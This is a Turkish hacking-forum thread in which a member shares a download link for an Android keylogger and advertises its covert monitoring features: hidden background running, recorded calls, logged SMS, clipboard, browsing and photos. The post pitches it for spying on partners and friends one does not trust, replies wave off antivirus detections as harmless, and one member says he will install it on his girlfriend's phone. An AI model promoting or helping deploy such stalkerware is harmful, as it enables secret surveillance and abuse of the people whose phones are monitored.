Apk-KeyLogger/Byzehirx

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

ByZehirx

Yaşayan Forum Efsanesi
10 Şub 2012
12,440
2,051
35
Osmaniye 80
Android-KeyLogger/Byzehirx

Herkeze Merhaba arkadaşlar yeniden bir aradayız gelişimizden sonra kısa bir ayrılık girdi aramıza.

Bugun Size Yeni bir uygulama tanıtacagım geçen bir keylogger konumda arkadaslarımız rica etmişti
bende acizade hem kendimden hem sizden hemde Turkhackteam dan birşeylar katarak

bir uygulamayı ele aldım ve elimden geldikce geliştirmek adına gayret ettim

Sevgilisi olup guvenemıyen dostu olup guvenemıyen arkadası olup guvenemıyenler icin
ideal bir keylogger

hemen özelliklerinden bassedeyim

Android uyumlu Koruma avantajları:- Takip edilen kullanıcı için gizlidir- Giden ve gelen aramalar dinlemeniz için uygun olan mp3 dosyası olarak kaydolur- Telefon kamerası ile çekilen fotografları kaydeder v.b.

Temel Özellikleri:
- rehber isimleri ile birlikte arama kayıdı- giden, gelen SMS kayıdı- panoya kopyalanan metin kayıdı- Wi-Fi, USB veya SD kartın durum kayıdı- Kullanılan uygulama kayıdı- Ziyaret edilen web site kayıdı
- Arka planda gizli olarak çalışır
Telefondan günlük dosyalarını izleyebilirsiniz

VsVsVs daha bir cok şey

https://yadi.sk/d/0cepTVT_3LaPkj

https://www.virustotal.com/tr/file/...90e05794400d9eec29f48773/analysis/1466091148/

DİPNOT-Virüs Bulur ama unutmayın ki bu Kişisel ve özel hayata gizli bir arka kapıdır. ve kolay olmaz

Son düzenleme:

ByZehirx

Yaşayan Forum Efsanesi
10 Şub 2012
12,440
2,051
35
Osmaniye 80
Hepsi log virüsü bulmuş kardeşim

Normalde ben kullanıyorum ve bunları ciddi virüs olarakta görmüyorum cunku systeme zarar vermıyor sadece systeme ben burdayım dıyor system onu uyarı olarak alıyor.

Ama bana sorarsanız 5-6 aydır kullanıyorum birgun olsun sıkıntı olmadı cok sukur

HeLLioN16

Katılımcı Üye
2 Ocak 2016
447
0
Normalde ben kullanıyorum ve bunları ciddi virüs olarakta görmüyorum cunku systeme zarar vermıyor sadece systeme ben burdayım dıyor system onu uyarı olarak alıyor.

Ama bana sorarsanız 5-6 aydır kullanıyorum birgun olsun sıkıntı olmadı cok sukur

Senin serverini yemeyelim de dostum :D

ByZehirx

Yaşayan Forum Efsanesi
10 Şub 2012
12,440
2,051
35
Osmaniye 80
Cok sukur uzun surmedi özlem.

Ee eli boş gelmekte bize yakismazdi.

Bilgi paylasmak ve bilgi edinmek her daim en iyisinden en yenisine
Tehcube katan yoldur.

Ruh

Adanmış Üye
10 Eyl 2015
6,465
45
Hoşgeldin. Ellerine sağlık.

Arkadaşlar virüsler zararsızdır buna benzer daha gelişmiş bir şey kullanıyorum. Onda da aynı şekilde virüstotal kabarık ama zararsız. Erişim izinleri falan hepsi açık olmalı ki log kayıtlarını istediğiniz şekilde tutsun.

Son düzenleme:

ByZehirx

Yaşayan Forum Efsanesi
10 Şub 2012
12,440
2,051
35
Osmaniye 80
Hoşgeldin. Ellerine sağlık.

Arkadaşlar virüsler zararsızdır buna benzer daha gelişmiş bir şey kullanıyorum. Onda da aynı şekilde virüstotal kabarık ama zararsız. Erişim izinleri falan hepsi açık olmalı ki log kayıtlarını tutsun istesiğiniz şekilde tutsun.

Seni yaratana kurban helal kardesime on numara aciklamis :)

:RpS_thumbup:

ByMcKaRaKeFeN

Uzman üye
8 Haz 2010
1,079
1
GaziAntep
Kardeşim İşlevi Sadece Uygulanan Telefonda Loglari Alip O Telefona Bi Yeremi kaydediyor Yoksa baska bir telefondan o loglarıda izliyebiliyormuyuz Ben pek Anlıyamadım İos Kullanıcısı Olarak ?

ByZehirx

Yaşayan Forum Efsanesi
10 Şub 2012
12,440
2,051
35
Osmaniye 80
Kardeşim İşlevi Sadece Uygulanan Telefonda Loglari Alip O Telefona Bi Yeremi kaydediyor Yoksa baska bir telefondan o loglarıda izliyebiliyormuyuz Ben pek Anlıyamadım İos Kullanıcısı Olarak ?

İos isen hic ilgilenme zaten yannis anlama ios sevmiyorumda defalarca hacklenmesine rahmen bugun halen kaliteyiz diye insanlari soyuyorlar yazik gunah dolar ile pazar yapmaya calisiyor fakat.
İos tek ozelli
Marsta ilk fotoyu alan kamera mercegine sahip olmasi
Lakin buda ios kurtarmiyacak cunku
Bugunden soyluyorum ki
Gelecegin teknolojisi suan pazarda olmiyan motorola olacak samsung sony vs vs bunlar saf disi kalacak ki ios da oyle.

Sebep Dunya devi Google motorolayi satin aldi.

Kisacasi ios ile ilgili hic bir konuya basvurmuyorum ki

Yarin yok olmasin diye

ByMcKaRaKeFeN

Uzman üye
8 Haz 2010
1,079
1
GaziAntep
İos isen hic ilgilenme zaten yannis anlama ios sevmiyorumda defalarca hacklenmesine rahmen bugun halen kaliteyiz diye insanlari soyuyorlar yazik gunah dolar ile pazar yapmaya calisiyor fakat.
İos tek ozelli
Marsta ilk fotoyu alan kamera mercegine sahip olmasi
Lakin buda ios kurtarmiyacak cunku
Bugunden soyluyorum ki
Gelecegin teknolojisi suan pazarda olmiyan motorola olacak samsung sony vs vs bunlar saf disi kalacak ki ios da oyle.

Sebep Dunya devi Google motorolayi satin aldi.

Kisacasi ios ile ilgili hic bir konuya basvurmuyorum ki

Yarin yok olmasin diye

ios konusunda haklısında kardeşim ben sadece işlevini sormustum yoksa bende mecburiyetten kullanıyorum bütcem sıkıntılı Androide gecicemde Hatunun telefonunda Denicem Ondan sordum :)

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.